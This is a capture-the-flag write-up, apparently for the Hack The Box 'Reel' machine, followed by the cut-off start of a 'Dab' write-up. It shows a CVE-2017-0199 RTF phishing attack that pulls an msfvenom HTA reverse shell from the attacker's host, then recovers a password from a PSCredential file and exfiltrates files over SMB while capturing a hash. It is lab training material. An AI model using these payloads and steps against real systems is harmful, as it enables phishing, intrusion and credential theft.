SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 1s, median: -2s
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2021-01-12T16:19:31+00:00
| smb-security-mode:
| account_used: <****blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-01-12T16:19:32
|_ start_date: 2021-01-12T16:10:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.48 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 21 so let's investigate it:
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
→ ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:nothing): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18 11:19PM <****DIR> documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> mget *
mget AppLocker.docx?
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 9 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
2047 bytes received in 0.03 secs (63.6166 kB/s)
mget readme.txt?
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
124 bytes received in 0.03 secs (3.6738 kB/s)
mget Windows Event Forwarding.docx?
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 51 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
14581 bytes received in 0.07 secs (200.3977 kB/s)
ftp> ^C
ftp> exit
221 Goodbye.
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
→ l
total 32K
drwxr-xr-x 2 nothing nothing 4.0K Jan 12 17:29 .
drwxr-xr-x 3 nothing nothing 4.0K Jan 12 17:29 ..
-rw-r--r-- 1 nothing nothing 2.0K Jan 12 17:27 AppLocker.docx
-rw-r--r-- 1 nothing nothing 122 Jan 12 17:27 readme.txt
-rw-r--r-- 1 nothing nothing 15K Jan 12 17:27 'Windows Event Forwarding.docx'
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
→ cat readme.txt
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.%
Let's use exiftool to check out the metadata of these files since readme didn't give us anything specific:
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
→ exiftool AppLocker.docx
ExifTool Version Number : 12.13
File Name : AppLocker.docx
Directory : .
File Size : 2047 bytes
File Modification Date/Time : 2021:01:12 17:27:13+01:00
File Access Date/Time : 2021:01:12 17:27:13+01:00
File Inode Change Date/Time : 2021:01:12 17:29:40+01:00
File Permissions : rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0008
Zip Compression : Deflated
Zip Modify Date : 2018:05:29 00:19:50
Zip CRC : 0x3cdd8b4f
Zip Compressed Size : 166
Zip Uncompressed Size : 284
Zip File Name : _rels/.rels
Not much in Applocker.docx, However in the last file we see a bit more useful infos:
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
→ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.13
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 14 KiB
File Modification Date/Time : 2021:01:12 17:27:15+01:00
File Access Date/Time : 2021:01:12 17:31:26+01:00
File Inode Change Date/Time : 2021:01:12 17:29:48+01:00
File Permissions : rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
For instance, this time we get a few more informations such as the username **nico** at the domain name **megabank.com** so let's add it to our hosts file:
[ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB/Reel]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.77 megabank.com' >> /etc/hosts
┌──(root💀nowhere)-[~]
└─# ping -c1 megabank.com
PING megabank.com (10.10.10.77) 56(84) bytes of data.
64 bytes from megabank.com (10.10.10.77): icmp_seq=1 ttl=127 time=450 ms
--- megabank.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 450.267/450.267/450.267/0.000 ms
┌──(root💀nowhere)-[~]
└─# exit
[ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB/Reel]
So let's open up the docx document and see what's in it using libreoffice:
![](prg/11/1.png)
However that's about it for ftp, now let's move on to that smtp port using telnet Which is where we need to send a malicious email which contains a malicious .rtf file as we got hinted to do earlier, to the nico user. We're going to use [CVE-2017-0199](https://www.exploit-db.com/exploits/41934) :
First we generate the HTA file:
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.9 LPORT=9001 -f hta-psh -o msfv.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7431 bytes
Saved as: msfv.hta
[term2]
[ 10.10.16.9/23 ] [ /dev/pts/14 ] [HTB/Reel/CVE-2017-0199]
→ nc -lvnp 9001
listening on [any] 9001 ...
Note that this msfv.hta file is going to trigger the reverse shell connection back to us on port **9001** so don't forget to have your netcat ready
Then we generate the RTF file:
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ git clone https://github.com/bhdresh/CVE-2017-0199
Cloning into 'CVE-2017-0199'...
remote: Enumerating objects: 298, done.
remote: Total 298 (delta 0), reused 0 (delta 0), pack-reused 298
Receiving objects: 100% (298/298), 288.09 KiB | 1.20 MiB/s, done.
Resolving deltas: 100% (102/102), done.
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ cd CVE-2017-0199
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [HTB/Reel/CVE-2017-0199]
→ python2 cve-2017-0199_toolkit.py -M gen -w nihilist.rtf -u http://10.10.16.9/msfv.hta -t rtf -x 0
Generating normal RTF payload.
Generated nihilist.rtf successfully
Note the **-u** parameter which is going to be the URL from which the box is going to get the **msfv.hta** file from, and next step is to send the phishing email with the **sendEmail** utility:
[term1]
[ 10.10.16.9/23 ] [ /dev/pts/16 ] [~/HTB/Reel]
→ ls -lash msfv.hta; sudo python3 -m http.server 80
8.0K -rw-r--r-- 1 nothing nothing 7.3K Dec 26 18:55 msfv.hta
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
[term2]
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [HTB/Reel/CVE-2017-0199]
→ sendEmail -f nihilist@megabank.com -t nico@megabank.com -u "check the attached file" -m "very important mail" -a nihilist.rtf -s 10.129.179.102 -v
Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => Connecting to 10.129.179.102:25
Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => My IP address is: 10.10.16.9
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 220 Mail Service ready
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: EHLO nowhere
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: MAIL FROM:<****nihilist@megabank.com>
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250 OK
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: RCPT TO: <****nico@megabank.com>
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250 OK
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: DATA
Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 354 OK, send.
Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending message body
Dec 26 19:08:30 nowhere sendEmail[885036]: Setting content-type: text/plain
Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => Sending the attachment [nihilist.rtf]
Dec 26 19:08:43 nowhere sendEmail[885036]: SUCCESS => Received: 250 Queued (12.220 seconds)
Dec 26 19:08:43 nowhere sendEmail[885036]: Email was sent successfully! From: <****nihilist@megabank.com> To: <****nico@megabank.com> Subject: [check the attached file] Attachment(s): [nihilist.rtf] Server: [10.129.179.102:25]
Then we need to wait a few minutes for nico to fall for the phishing attempt, and we get a shell:
[ 10.10.16.9/23 ] [ /dev/pts/14 ] [HTB/Reel/CVE-2017-0199]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.9] from (UNKNOWN) [10.129.179.102] 51538
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
htb\nico
And we got a reverse shell connection ! We are now logged in as the nico user, so let's see if we can get the user flag:
C:\Windows\system32>cd ../../
cd ../../
C:\>cd Users\
cd Users\
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users
03/11/2017 23:09 DIR> .
03/11/2017 23:09 DIR> ..
25/10/2017 20:48 DIR> .NET v2.0
25/10/2017 20:48 DIR> .NET v2.0 Classic
01/11/2017 21:58 DIR> .NET v4.5
01/11/2017 21:58 DIR> .NET v4.5 Classic
16/02/2018 23:29 DIR> Administrator
04/11/2017 23:05 DIR> brad
30/10/2017 23:00 DIR> claire
25/10/2017 20:48 DIR> Classic .NET AppPool
03/11/2017 23:09 DIR> herman
31/10/2017 22:27 DIR> julia
26/12/2021 12:30 DIR> nico
22/08/2013 15:39 DIR> Public
28/10/2017 21:32 DIR> SSHD
16/11/2017 22:35 DIR> tom
0 File(s) 0 bytes
16 Dir(s) 15,739,142,144 bytes free
C:\Users>cd nico
cd nico
C:\Users\nico>cd desktop
cd desktop
C:\Users\nico\Desktop>type user.txt
type user.txt
faXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we got the user flag!
## **Part 3 : Getting Root Access**
Now on nico's desktop we see the following:
C:\Users\nico\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\nico\Desktop
28/05/2018 20:07 DIR> .
28/05/2018 20:07 DIR> ..
27/10/2017 23:59 1,468 cred.xml
27/10/2017 23:40 32 user.txt
2 File(s) 1,500 bytes
2 Dir(s) 15,739,027,456 bytes free
C:\Users\nico\Desktop>type cred.xml
type cred.xml
<****Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <****Obj RefId="0"> <****TN RefId="0"> <****T>System.Management.Automation.PSCredential <****/T> <****T>System.Object <****/T> <****/TN> <****ToString>System.Management.Automation.PSCredential <****/ToString> <****Props> <****S N="UserName">HTB\Tom <****/S> <****SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692 <****/SS> <****/Props> <****/Obj> <****/Objs>
Here we see an output of the **Export-CliXml** command, which is this **cred.xml** file, we can get the password of tom out of it:
C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
UserName : Tom
Password : **1ts-mag1c!!!**
SecurePassword : System.Security.SecureString
Domain : HTB
And we have tom's password! Now let's ssh as the tom user using his password:
[ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ ssh tom@megabank.com
The authenticity of host 'megabank.com (10.129.179.102)' can't be established.
ED25519 key fingerprint is SHA256:fIZnS9nEVF3o86fEm/EKspTgedBr8TvFR0i3Pzk40EQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'megabank.com' (ED25519) to the list of known hosts.
tom@megabank.com's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>whoami
htb\tom
And we now have access to tom's system account! Let's take a look around:
tom@REEL C:\Users\tom>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom
11/16/2017 10:35 PM DIR> .
11/16/2017 10:35 PM DIR> ..
10/27/2017 11:38 PM DIR> Contacts
05/29/2018 07:57 PM DIR> Desktop
10/27/2017 11:38 PM DIR> Documents
10/29/2017 09:08 PM DIR> Downloads
10/27/2017 11:38 PM DIR> Favorites
10/27/2017 11:38 PM DIR> Links
10/27/2017 11:38 PM DIR> Music
10/27/2017 11:38 PM DIR> Pictures
10/27/2017 11:38 PM DIR> Saved Games
10/27/2017 11:38 PM DIR> Searches
10/27/2017 11:38 PM DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 15,736,729,600 bytes free
tom@REEL C:\Users\tom>cd Desktop
tom@REEL C:\Users\tom\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop
05/29/2018 07:57 PM DIR> .
05/29/2018 07:57 PM DIR> ..
05/29/2018 08:02 PM DIR> AD Audit
0 File(s) 0 bytes
3 Dir(s) 15,736,729,600 bytes free
tom@REEL C:\Users\tom\Desktop>cd "AD Audit"
tom@REEL C:\Users\tom\Desktop\AD Audit>
tom@REEL C:\Users\tom\Desktop\AD Audit>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit
05/29/2018 08:02 PM DIR> .
05/29/2018 08:02 PM DIR> ..
05/29/2018 11:44 PM DIR> BloodHound
05/29/2018 08:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 15,736,729,600 bytes free
tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
Here we are hinted that there has been an AD audit, let's see if we have access to interesting bloodhound files:
tom@REEL C:\Users\tom\Desktop\AD Audit>cd BloodHound
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound
05/29/2018 11:44 PM DIR> .
05/29/2018 11:44 PM DIR> ..
05/29/2018 07:57 PM DIR> Ingestors
10/30/2017 10:15 PM 769,587 PowerView.ps1
1 File(s) 769,587 bytes
3 Dir(s) 15,736,729,600 bytes free
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>cd Ingestors
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
05/29/2018 07:57 PM DIR> .
05/29/2018 07:57 PM DIR> ..
11/16/2017 11:50 PM 112,225 acls.csv
10/28/2017 08:50 PM 3,549 BloodHound.bin
10/24/2017 03:27 PM 246,489 BloodHound_Old.ps1
10/24/2017 03:27 PM 568,832 SharpHound.exe
10/24/2017 03:27 PM 636,959 SharpHound.ps1
5 File(s) 1,568,054 bytes
2 Dir(s) 15,736,729,600 bytes free
So let's transfer the bloodhound files back to our local machine:
[term 1]
[ 10.10.16.9/23 ] [ /dev/pts/14 ] [~/HTB/Reel]
→ impacket-smbserver -smb2support nihilist .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[term 2]
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>copy * \\10.10.16.9\nihilist\
acls.csv
BloodHound.bin
BloodHound_Old.ps1
SharpHound.exe
SharpHound.ps1
5 file(s) copied.
[term 1]
[*] Incoming connection (10.129.179.102,61795)
[*] AUTHENTICATE_MESSAGE (HTB\tom,REEL)
[*] User REEL\tom authenticated successfully
[*] tom::HTB:aaaaaaaaaaaaaaaa:97ed7e26f0ec5b28ae6cb130414917ed:0101000000000000809d2c0658fbd70124aa28f4ea690e2f00000000010010007700660056004200780073004100710003001000770066005600420078007300410071000200100043007700570048007300450056005300040010004300770057004800730045005600530007000800809d2c0658fbd701060004000200000008003000300000000000000000000000003000005085ea7922d5329d13836e2e2a7350eacf7ee793c7c9205c7ad5e64f5183febb0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:nihilist)
^C
[ 10.10.16.9/23 ] [ /dev/pts/14 ] [~/HTB/Reel]
→ ls -lash
total 1.6M
4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 20:29 .
4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 25 21:26 ..
112K -rwxr-xr-x 1 nothing nothing 110K May 29 2018 acls.csv
4.0K -rwxr-xr-x 1 nothing nothing 3.5K Oct 29 2017 BloodHound.bin
244K -rwxr-xr-x 1 nothing nothing 241K Oct 29 2017 BloodHound_Old.ps1
4.0K drwxr-xr-x 4 nothing nothing 4.0K Dec 26 19:00 CVE-2017-0199
8.0K -rw-r--r-- 1 nothing nothing 7.3K Dec 26 18:55 msfv.hta
556K -rwxr-xr-x 1 nothing nothing 556K Oct 29 2017 SharpHound.exe
624K -rwxr-xr-x 1 nothing nothing 623K Oct 29 2017 SharpHound.ps1
Now that we have transfered the files back to our machine, let's inspect them using bloodhound:
[ 10.10.16.9/23 ] [ /dev/pts/15 ] [~/Tools]
→ sudo apt install neo4j
[ 10.10.16.9/23 ] [ /dev/pts/15 ] [~/Tools]
→ sudo neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /usr/share/neo4j/run
Starting Neo4j.
2021-12-27 20:10:00.054+0000 INFO Starting...
2021-12-27 20:10:00.455+0000 INFO This instance is ServerId{39ac0325} (39ac0325-ca50-4041-ba6d-444c78dc4026)
2021-12-27 20:10:02.130+0000 INFO ======== Neo4j 4.4.2 ========
2021-12-27 20:10:03.469+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2021-12-27 20:10:03.473+0000 INFO Setting up initial user from defaults: neo4j
2021-12-27 20:10:03.474+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2021-12-27 20:10:03.481+0000 INFO Setting version for 'security-users' to 3
2021-12-27 20:10:03.483+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2021-12-27 20:10:03.488+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2021-12-27 20:10:03.700+0000 INFO Bolt enabled on localhost:7687.
2021-12-27 20:10:04.423+0000 INFO Remote interface available at http://localhost:7474/
2021-12-27 20:10:04.428+0000 INFO id: AC467907227285E4E491280BBC436619BBDF6A413FD78BD3F4BCB8455310E603
2021-12-27 20:10:04.428+0000 INFO name: system
2021-12-27 20:10:04.428+0000 INFO creationDate: 2021-12-27T20:10:02.593Z
2021-12-27 20:10:04.428+0000 INFO Started.
Then goto **http://127.0.0.1:7474** and login with credentials **neo4j:neo4j**
![](prg/11/2.png)
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
→ wget https://github.com/BloodHoundAD/BloodHound/releases/download/4.0.3/BloodHound-linux-x64.zip
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
→ mkdir Bloodhound
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
→ mv BloodHound-linux-x64.zip Bloodhound/
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
→ cd Bloodhound
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
→ unzip BloodHound-linux-x64.zip
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
→ ls -l
total 100032
drwxrwxr-x 5 nothing nothing 4096 Jul 15 20:13 BloodHound-linux-x64
-rw-r--r-- 1 nothing nothing 102425633 Dec 8 05:47 BloodHound-linux-x64.zip
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
→ cd BloodHound-linux-x64
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [Tools/Bloodhound/BloodHound-linux-x64]
→ ls -l
total 175752
-rwxr-xr-x 1 nothing nothing 127561112 Jul 15 20:13 BloodHound
-rw-r--r-- 1 nothing nothing 179981 Jul 15 20:13 chrome_100_percent.pak
-rw-r--r-- 1 nothing nothing 321151 Jul 15 20:13 chrome_200_percent.pak
-rwxr-xr-x 1 nothing nothing 6322128 Jul 15 20:13 chrome-sandbox
-rw-r--r-- 1 nothing nothing 10505952 Jul 15 20:13 icudtl.dat
-rwxr-xr-x 1 nothing nothing 243992 Jul 15 20:13 libEGL.so
-rwxr-xr-x 1 nothing nothing 3103488 Jul 15 20:13 libffmpeg.so
-rwxr-xr-x 1 nothing nothing 8948976 Jul 15 20:13 libGLESv2.so
-rwxr-xr-x 1 nothing nothing 4488304 Jul 15 20:13 libvk_swiftshader.so
-rwxr-xr-x 1 nothing nothing 8483376 Jul 15 20:13 libvulkan.so
-rw-r--r-- 1 nothing nothing 1060 Jul 15 20:13 LICENSE
-rw-r--r-- 1 nothing nothing 4710103 Jul 15 20:13 LICENSES.chromium.html
drwxrwxr-x 2 nothing nothing 4096 Jul 15 20:13 locales
drwxrwxr-x 3 nothing nothing 4096 Jul 15 20:13 resources
-rw-r--r-- 1 nothing nothing 4835574 Jul 15 20:13 resources.pak
-rw-r--r-- 1 nothing nothing 50591 Jul 15 20:13 snapshot_blob.bin
drwxrwxr-x 2 nothing nothing 4096 Jul 15 20:13 swiftshader
-rw-r--r-- 1 nothing nothing 170904 Jul 15 20:13 v8_context_snapshot.bin
-rw-r--r-- 1 nothing nothing 5 Jul 15 20:13 version
-rw-r--r-- 1 nothing nothing 107 Jul 15 20:13 vk_swiftshader_icd.json
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [Tools/Bloodhound/BloodHound-linux-x64]
→ sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound
[sudo] password for nothing:
` ![](prg/11/3.png) ![](prg/11/4.png) ![](prg/11/5.png)
Now this means that you need to install the bloodhound version that was available at the time when the box was released, so let's install the Bloodhound version from 2018:
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ which bloodhound
/usr/local/bin/bloodhound
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ rm /usr/local/bin/bloodhound
rm: cannot remove '/usr/local/bin/bloodhound': Permission denied
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ sudo !!
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ sudo rm /usr/local/bin/bloodhound
[sudo] password for nothing:
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/Tools]
→ ls -lash
total 12K
4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 21:19 .
4.0K drwxr-xr-x 28 nothing nothing 4.0K Mar 27 12:49 ..
4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 21:19 Bloodhound
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/Tools]
→ rm -rf Bloodhound
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
→ wget https://github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/BloodHound-linux-x64.zip
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
→ unzip BloodHound-linux-x64.zip
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
→ cd BloodHound-linux-x64
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound
[sudo] password for nothing:
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ which bloodhound
/usr/local/bin/bloodhound
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ bloodhound
bloodhound: error while loading shared libraries: libgconf-2.so.4: cannot open shared object file: No such file or directory
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ sudo apt install libgconf-2-4 -y
Reading package lists... Done
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ bloodhound
Gtk-Message: 13:00:16.146: Failed to load module "gail"
Then we repeat the previous steps and see the result after uploading the acls.csv file:
## **Conclusion**
Here we can see the progress graph :

848
Hard/12.md Normal file
View file

@ -0,0 +1,848 @@
# Dab Writeup
![](img/12.png)
## Introduction :
Dab is a hard linux box released back in August 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~/_HTB/dab]
→ sudo nmap -vvv -sTU -p- 10.10.10.86 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 80/tcp on 10.10.10.86
Discovered open port 22/tcp on 10.10.10.86
Discovered open port 21/tcp on 10.10.10.86
Discovered open port 8080/tcp on 10.10.10.86
